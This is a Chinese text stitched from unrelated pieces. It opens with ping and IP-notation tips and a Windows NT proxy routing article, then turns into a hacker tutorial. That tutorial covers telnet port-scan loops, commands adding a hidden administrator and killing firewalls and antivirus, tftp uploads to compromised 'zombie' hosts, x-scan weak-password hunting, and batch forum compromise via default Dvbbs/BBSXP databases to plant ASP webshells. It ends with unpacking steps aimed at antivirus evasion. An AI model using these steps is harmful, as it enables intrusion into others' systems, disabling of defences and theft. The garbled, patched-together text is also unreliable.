如果这一个或多个 “.0”没有紧挨着最后一部分的十进制数字，而是在其他位置，则这个“.0”不能省略，如“ping 202.0.96.1”就不能写成“ping 202.96.1”。这是因为“ping 202.96.1”返回的结果是“202.96.0.1”的应答信息，而不是“202.0.96.1”的应答信息。

数字串代替IP地址

在Ping命令中，还可以使用数字串代替IP地址，你相信吗?运行“ping 3658906394”命令，你会看到“218.22.123.26”这个IP地址的返回信息。

为什么会这样呢?其实，“3658906394”就是IP地址“218.22.123.26”的另一种表示形式。当然，也可按同样的方法Ping其他的IP地址。

字符串是如何转换而来的呢?其实并不复杂，以“218.22.123.26”这个IP地址为例，IP地址转换成数字串方法如下:先将 “218.22.123.26”转换为十六进制“DA.16.7B.1A”，然后去掉小数点后，变为“DA167B1A”，最后将这个十六进制数转换为十进制“3658906394”，那么“218.22.123.26”就变为“3658906394”了。其他IP地址转换为数字串也是使用同样的方法。

提示:在某些局域网环境中，使用“Ping+数字串”命令可能会失败，出现提示信息“Unknown host数字串”，这是因为该数字串被解析成主机名了，而不是IP地址。

因此，掌握了上述技巧后，网管在进行网络测试或维护时，可以熟练运用“省略”方式，减轻Ping命令的字符输入量，提高工作效率。同时，使用数字串代替IP地址也可迷惑好奇心强的普通用户，以免他们胡乱设置。

　　利用局域网

　　目前局域网的组网产品很多，以太网交换机或集线器（HUB）价格低廉，非常容易实现局域网客户的互联。本文以现有园区网为例，阐述如何利用PROXY代理服务器实现Internet连接，并进行代理服务器的内部路由分析。本局域网的拓扑结构如图1所示，局域网组成为：客户机若干台，服务器一台，拨号网络服务器一台，连接Internet的调制解调器一台。

　　具体配置如下：

　　1、客户机：安装WINDOWS 95/98，IE浏览器（Internet Explorer4.0或5.0）。在Internet Explorer的“选项，连接”一栏中选择“使用代理服务器访问Internet”，并将代理服务器的IP地址和端口号（80）填入“地址”和“端口”项，如此便完成了客户端的简单配置。

　　2、服务器：安装WINDOWS NT和PROXY软件。配置服务器的RAS、拨号网络、TCP/IP等，建立WINDOWS用户帐户，启动PROXY软件，启动WEB、FTP等代理任务并进行权限设置，给予客户访问Internet的权限等。

 　　
3、调制解调器：在服务器端配置一台调制解调器（MODEM），一条电话线。拨通本地的Internet电话，如169、163等。

　　4、拨号网络服务器：在局域网中为远程用户提供服务，使远程用户可以通过专用通讯线路与局域网连接。

　　代理服务器的路由问题

　　配置服务器的RAS服务和拨号网络后，进行拨号连接。此时的代理服务器中相当于存在两块接口卡，即一个网卡和一个调制解调器，可以把它看作是一个路由器，为客户和外界提供路由转发功能，因此必须查看并调整服务器的路由设置，以保证服务器与客户的正常通讯。

　　在服务器上进行拨号，在DOS模式下通过ROUTE命令查看服务器的路由表。下面仅以缺省路由为例简单分析NT服务器在拨号过程中的路由表，假设10.119.40.254为服务器所在网段的网关，10.119.40.49为NT服务器网卡的IP地址。

　　拨号前服务器路由表（表1）：

　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1

　　拨号后服务器路由表（表2）：

　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2

　　0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1

　　其中10.18.168.168为INTERNET服务器分配给本拨号网络（调制解调器）的IP地址。经对比表1和表2，在拨号前后的缺省路由有了变化。分析这一现象，主要是由于在服务器中“拨号网络”，“TCP/IP设置”的选项中，选择了“使用拨号网络的默认网关”的缘故，这样服务器每次向10.119.40.0网段的客户发送信息都首先经过10.18.168.168的地址。当网络上的客户要求访问INTERNET站点时，每次都要通过局域网到NT服务器，然后至MODEM。所以必须保障客户机与服务器的正常连通，使路由过程通过10.119.40.49局域网网卡进行。应用PING命令进行检测，服务器可以PING通客户机，而客户机PING服务器时出现超时（TIME OUT）。这一现象表明由于代理服务器的默认路由发生了变化，从而使客户与服务器的连通首先要经过10.18.168.168来转发。解决这一问题须做以下设置，假设某客户所在网段为122.103.1.0，SUBMASK:255.255.255.0，需向路由表中填加指定项目，即执行命令ROUTE ADD 122.103.1.0 255.255.255.0 10.119.40.49。其中10.119.40.49为NT服务器的网卡IP地址，再查看服务器路由表如下：

　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2

　　0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1

　　122.103.1.0 255.255.255.0 10.199.40.254 10.119.40.49 1

　　进一步分析，我们还可以通过修改默认路由的方法来达到我们的目的，即使用ROUTE ADD 0.0.0.0 0.0.0.0 10.119.40.49 1 IF METRIC=2

　　使路由表设置为：

　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1

　　作为特殊情况，我们分析一下局域网远程用户的路由问题。在局域网中存在远程用户，它们通常经过专用的通讯线路与局域网连接，如果它们试图通过代理服务器访问INTERNET，必须在NT服务器上配置路由表。由于这类远程用户访问INTERNET需要经过2次拨号服务，在PROXY代理服务器上直接的路由设置尤其必要。如上所述，局域网的客户还可以通过修改默认路由的方法使服务器和客户连通。对于远程客户则不然，必须直接设置代理服务器的路由。假设远程用户（拨号网络服务器）所在的网段为122.100.1.0，SUBMASK:255.255.255.0，须加入路由：ROUTE ADD 122.100.1.0 255.255.255.0 10.119.40.49，才能保证远程用户的直通性。否则，在客户拨通局域网时，远程客户机能PING通网上其它所有的设备，惟独PING NT服务器时超时错误。这说明代理服务器的默认路由此时并没有起作用。

　　用户的管理

　　通过WINDOWS NT可以对每个代理用户进行管理。在客户访问INTERNET时，首先要在代理服务器上进行用户验证，在用户输入正常的用户名和密码时，才能为其提供INTERNET服务，然后通过代理服务器访问INTERNET。代理服务器软件可使用MS PROXY 2.0，它提供了大量的代理权限的控制，使用它可以对授权用户、访问站点等进行方便地管理、监视、记录等。

             for /l %a in (1,1,65535) do start /low /min telnet 192.168.0.1%a
              
 
这样就扫描192.168.0.1的1到65535端口。

现在扫描一个网段的所有端口

             for /l %a in (1,1,254) do for /l %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b
           
 
这样就会扫描192.168.0.x段的全部1到65535段口。

以上命令只能在Windows2000下使用，因为/l累加参数是Windows2000对for的扩展，当然WindowsXP和Windows.NET都可以用，WindowsME我没有试过，因为没有WindowsME的机器。

一.对用户操做

net user --------查看有哪些用户

net user guest /active:yes ------ 激活guest用户

net user 用户名　密码　/add ------建立用户

net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限

二．必备命令

net start -----查看开启了哪些服务

net start 服务名-----开启服务

net stop 服务名------停止某服务

netstat -an :查看端口的网络连接情况

ipconfig :查看本地ip地址

三．关防火墙，杀毒软件命令

net stop sharedaccess ----关系统自带防火墙

pskill.exe ravmon -----杀掉瑞星软件

pskill.exe pfw ----关天网防火墙

net stop "Symantec AntiVirus"----关于诺顿企业版

net stop KAVStart------关闭金山杀毒

向肉鸡上传文件命令:

第一种方法:tftp

命令格式:tftp -i 你的公网IP get xx.exe

：计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音罖@刂瞥绦?br>sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

第二课:x-scan扫描器的使用技巧详解

一.详解x-scan的配置:

1.扫描模块设置:

1).开放服务

(2).远程控制系统

(3).nt-server弱口令-----administrator 空口令或弱口令.

(4).sql-server弱口令 ---sa 空口令或弱口令.

2.扫描IP范围设置:

(1).指定IP范围.

(2).从文件中导入IP列表.

二.x-scan在入侵中的应用:

1.对系统的综合安全检测,有针对性的入侵.

2.找肉鸡

nt-server弱口令

sql-server弱口令

3.邮箱,ftp,vnc的破解

三.x-scan入侵实例演示部分:

1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)

2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)

s扫描-----扫开放1433的机子

x-scan扫描-----对开放1433的机子进行弱口令探测.

第五课:网站猎手批量入侵实战演示

黑天

一.二个重点要素:

1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.

选择技巧:一般选择论坛最低部的版权信息或程序名称.

2.检测的页面或文件: 也就是程序存在漏洞的地方

二.网站猎手批量入侵实战演示篇:

1.实战演示一:

检测的页面或文件: data/dvbbs7.mdb

关键字:Powered By ：Dvbbs Version 7.0.0

由默认数据库到拿网站webshell过程:

第一步:下载动网默认数据库

第二步:在数据库中找管理员密码

技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.

第三步:在前台以jpg格式上传asp木马.

第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.

2.演示二:

检测的页面或文件:database/bbsxp.mdb

关键字:Powered by BBSXP 7.00

3.演示三:

检测的页面或文件:upfile_flash.asp

关键字:商城

四:关于批量得webshell的其它思路

1.思路一:

到大型源码下载中心,把下载量较大的源程序,下载回来研究.

主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.

然后用关键字结合网站猎手批量检测.很快就提到大量webshell

2.思路二:社会工程学批量入侵拿webshell

1.免杀

2.破解

3.程序汉化,个性修改.

二.脱壳四步骤:

第一步:查壳

常用查壳工具: PEID ,FI ,PE-SCAN 等.

第二步:找OEP

工具:ollydbg

第三步:脱壳

常用脱壳工具:

1.OD自带的脱壳插件:右键脱壳之.

2.LordPE:选择所调试进程右键,完整脱壳.

第四步:修复

Import REConstructor 1.6

三.在ollydbg脱壳中常用快捷键介绍

F2: 下断点.

F4:运行到所选择的那一行.-----遇到向上跳时用到

F7:单步进入----遇到近call时用到.

F8:单步跟踪

F9:运行程序

Shift+F9 :忽略异常运行

Alt+M:打开内存镜像

什么时候用,用哪个?以后会在具体实践操作中具体讲